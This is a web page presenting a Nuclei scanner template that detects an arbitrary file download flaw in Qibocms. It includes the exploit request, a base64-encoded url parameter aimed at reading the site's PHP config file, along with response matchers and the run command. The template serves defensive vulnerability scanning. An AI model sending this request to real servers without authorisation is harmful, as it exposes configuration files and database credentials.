Skip to content

Qibocms - Arbitrary File Download

ID: qibocms-file-download

Severity: high

Author: theabhinavgaur

Tags: qibocms,lfr

Qibocms is vulnerable to arbitrary file download vulnerability.

id: qibocms-file-download
info:
name: Qibocms - Arbitrary File Download
author: theabhinavgaur
severity: high
description: Qibocms is vulnerable to arbitrary file download vulnerability.
metadata:
verified: true
max-request: 1
tags: qibocms,lfr
http:
- method: GET
path:
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "$webdb"
condition: and
- type: word
part: header
words:
- "filename=config"
- type: status
status:
- 200
# digest: 4a0a00473045022100c0b7dec25effde05152b788b381a34c0e2c486f1255118b932612e2ae006c31c02202dd448254a45e034cc541bfc463ba2612df81eec141eb3ecad9798e7ef72e115:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/qibocms-file-download.yaml"

View on Github